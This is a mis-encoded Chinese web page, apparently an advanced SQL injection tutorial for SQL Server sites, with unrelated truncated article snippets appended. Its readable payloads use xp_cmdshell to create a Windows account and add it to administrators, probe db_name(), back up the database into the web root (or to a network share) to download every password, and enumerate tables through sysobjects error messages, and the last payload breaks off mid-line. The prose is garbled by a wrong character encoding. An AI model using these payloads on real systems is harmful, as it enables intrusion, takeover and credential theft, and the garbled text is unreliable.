SQL×¢È멶´È«½Ó´¥
¿´ÍêÈëÃÅƪºÍ½ø½×ƪºó£¬ÉÔ¼ÓÁ·Ï°£¬ÆƽâÒ»°ãµÄÍøÕ¾ÊÇûÎÊÌâÁË¡£µ«Èç¹ûÅöµ½±íÃûÁÐÃû²Â²»µ½£¬»ò³ÌÐò×÷Õß¹ýÂËÁËһЩÌØÊâ×Ö·û£¬ÔõôÌá¸ß×¢ÈëµÄ³É¹¦ÂÊ£¿ÔõôÑùÌá¸ß²Â½âЧÂÊ£¿Çë´ó¼Ò½Ó×ÅÍùÏ¿´¸ß¼¶Æª¡£
µÚÒ»½Ú¡¢ÀûÓÃϵͳ±í×¢ÈëSQLServerÊý¾Ý¿â
SQLServerÊÇÒ»¸ö¹¦ÄÜÇ¿´óµÄÊý¾Ý¿âϵͳ£¬Óë²Ù×÷ϵͳҲÓнôÃܵÄÁªÏµ£¬Õâ¸ø¿ª·¢Õß´øÀ´Á˺ܴóµÄ·½±ã£¬µ«ÁíÒ»·½Ã棬ҲΪעÈëÕßÌṩÁËÒ»¸öÌø°å£¬ÎÒÃÇÏÈÀ´¿´¿´¼¸¸ö¾ßÌåµÄÀý×Ó£º
¢Ù http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--
¡¡¡¡·ÖºÅ;ÔÚSQLServerÖбíʾ¸ô¿ªÇ°ºóÁ½¾äÓï¾ä£¬--±íʾºóÃæµÄÓï¾äΪעÊÍ£¬ËùÒÔ£¬Õâ¾äÓï¾äÔÚSQLServerÖн«±»·Ö³ÉÁ½¾äÖ´ÐУ¬ÏÈÊÇSelect³öID=1µÄ¼Ç¼£¬È»ºóÖ´Ðд洢¹ý³Ìxp_cmdshell£¬Õâ¸ö´æ´¢¹ý³ÌÓÃÓÚµ÷ÓÃϵͳÃüÁÓÚÊÇ£¬ÓÃnetÃüÁîн¨ÁËÓû§ÃûΪname¡¢ÃÜÂëΪpasswordµÄwindowsµÄÕʺţ¬½Ó×Å£º
¢Ú http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
¡¡¡¡½«Ð½¨µÄÕʺÅname¼ÓÈë¹ÜÀíÔ±×飬²»ÓÃÁ½·ÖÖÓ£¬ÄãÒѾÄõ½ÁËϵͳ×î¸ßȨÏÞ£¡µ±È»£¬ÕâÖÖ·½·¨Ö»ÊÊÓÃÓÚÓÃsaÁ¬½ÓÊý¾Ý¿âµÄÇé¿ö£¬·ñÔò£¬ÊÇûÓÐȨÏÞµ÷ÓÃxp_cmdshellµÄ¡£
¡¡¡¡¢Û http://Site/url.asp?id=1 ;;and db_name()>0
Ç°ÃæÓиöÀàËƵÄÀý×Óand user>0£¬×÷ÓÃÊÇ»ñÈ¡Á¬½ÓÓû§Ãû£¬db_name()ÊÇÁíÒ»¸öϵͳ±äÁ¿£¬·µ»ØµÄÊÇÁ¬½ÓµÄÊý¾Ý¿âÃû¡£
¢Ü http://Site/url.asp?id=1;backup database Êý¾Ý¿âÃû to disk=’c:\inetpub\wwwroot\1.db’;--
ÕâÊÇÏ൱ºÝµÄÒ»ÕУ¬´Ó¢ÛÄõ½µÄÊý¾Ý¿âÃû£¬¼ÓÉÏijЩIIS³ö´í±©Â¶³öµÄ¾ø¶Ô·¾¶£¬½«Êý¾Ý¿â±¸·Ýµ½WebĿ¼ÏÂÃ棬ÔÙÓÃHTTP°ÑÕû¸öÊý¾Ý¿â¾ÍÍêÍêÕûÕûµÄÏÂÔØ»ØÀ´£¬ËùÓеĹÜÀíÔ±¼°Óû§ÃÜÂ붼һÀÀÎÞÒÅ£¡ÔÚ²»ÖªµÀ¾ø¶Ô·¾¶µÄʱºò£¬»¹¿ÉÒÔ±¸·Ýµ½ÍøÂçµØÖ·µÄ·½·¨£¨Èç\\202.96.xx.xx\Share\1.db£©£¬µ«³É¹¦Âʲ»¸ß¡£
¡¡¡¡¢Ý http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0
Ç°Ãæ˵¹ý£¬sysobjectsÊÇSQLServerµÄϵͳ±í£¬´æ´¢×ÅËùÓеıíÃû¡¢ÊÓͼ¡¢Ô¼Êø¼°ÆäËü¶ÔÏó£¬xtype=’U’ and status>0£¬±íʾÓû§½¨Á¢µÄ±íÃû£¬ÉÏÃæµÄÓï¾ä½«µÚÒ»¸ö±íÃûÈ¡³ö£¬Óë0±È½Ï´óС£¬Èñ¨´íÐÅÏ¢°Ñ±íÃû±©Â¶³öÀ´¡£µÚ¶þ¡¢µÚÈý¸ö±íÃûÔõô»ñÈ¡£¿»¹ÊÇÁô¸øÎÒÃÇ´ÏÃ÷µÄ¶ÁÕß˼¿¼°É¡£
¢Þ http://Site/url.asp?id=1 ;;and (Select Top 1 col_na
Ïà¹ØÎĵµ£º
ÏÖÔÚ´ó¶àÊýÃèÊöSQL Server 2005ÐÂÌØÐÔµÄÎÄÕ¶¼¹Ø×¢ÓÚ»ª¶ø²»ÊµµÄÌØÐÔ£¬ÈçSQLCLR»òXMLÊý¾ÝÀàÐÍ£¬¶ø¶ÔÐí¶àºÜºÃµÄÀϵÄT-SQLÓïÑԵĸĽøûÓеõ½Ó¦ÓеĹØ×¢¡£ÎÒÔø¾´ÓÐí¶àDBA¿ÚÖÐÌýµ½ÁîËûÃǸüÐ˷ܵÄÊÇ¿´µ½T-SQLÓïÑԵĸĽø,¶ø²»ÊÇÄÇЩгöÏֺͷ¢²¼µÄ¹¦ÄÜ¡£¶ÔÓÚSQLÓïÑÔµÄÒ»¸öºÜÓÐÓõÄʵ¼Ê¸Ä½øÊÇOUTPUT×Ӿ䣬ËüÔÊÐí²éѯһ¸öÊý¾ ......
ÕýÔÚ¼ÓÔØÊý¾Ý...
¡¡¡¡1.°´ÐÕÊϱʻÅÅÐò: select * from TableName Order By CustomerName Collate Chinese_PRC_Stroke_ci_as
¡¡¡¡2.Êý¾Ý¿â¼ÓÃÜ: select encrypt(’ÔʼÃÜÂë’) select pwdencrypt(’ÔʼÃÜÂë’) select pwdcompare(’ÔʼÃÜÂë’,’¼ÓÃܺóÃÜÂë’) = 1--Ïàͬ£»·ñÔ ......
This is very common request recently – How to import CSV file into SQL Server? How to load CSV file into SQL Server Database Table? How to load comma delimited file into SQL Server? Let us see the solution in quick steps.
CSV stands for Comma Separated Values, sometimes also called Co ......
ÔÚÒøÐнðÈÚϵͳÖУ¬ÎÒÃdz£³£¶¼ÒªÊµÏÖÒøÐÐתÕËÕâÑùµÄÒµÎñ²Ù×÷£¬¶øÕâÖÖ½ðÈÚϵͳ²¢·¢ÐÔÏ൱¸ß£¬ÐèÒª¿¼ÂǵÄÈçºÎÌá¸ßÐÔÄܺͱ£Ö¤°²È«ÐÔµÈÏà¹ØµÄÎÊÌ⡣ʹÓô洢¹ý³ÌÀ´ÊµÏÖÒøÐÐתÕËÊÇÒ»¸öºÜºÃµÄÑ¡Ôñ¡£
SQL SERVERÊý¾Ý¿âÖеĴ洢¹ý³ÌÏà¶ÔÓÚÓ¦ÓóÌÐòÖÐÀ´²Ù×÷Transact-SQLÓïÑÔµÄÓÅȱµã£º
Óŵ㣺
1. & ......
Ëæ×ÅB/SģʽӦÓÿª·¢µÄ·¢Õ¹£¬Ê¹ÓÃÕâÖÖģʽ±àдӦÓóÌÐòµÄ³ÌÐòÔ±Ò²Ô½À´Ô½¶à¡£µ«ÊÇÓÉÓÚÕâ¸öÐÐÒµµÄÈëÃÅÃż÷²»¸ß£¬³ÌÐòÔ±µÄˮƽ¼°¾ÑéÒ²²Î²î²»Æ룬Ï൱´óÒ»²¿·Ö³ÌÐòÔ±ÔÚ±àд´úÂëµÄʱºò£¬Ã»ÓжÔÓû§ÊäÈëÊý¾ÝµÄºÏ·¨ÐÔ½øÐÐÅжϣ¬Ê¹Ó¦ÓóÌÐò´æÔÚ°²È«Òþ»¼¡£Óû§¿ÉÒÔÌá½»Ò»¶ÎÊý¾Ý¿â²éѯ´úÂ룬¸ù¾Ý³ÌÐò·µ»ØµÄ½á¹û£¬»ñµÃijР......
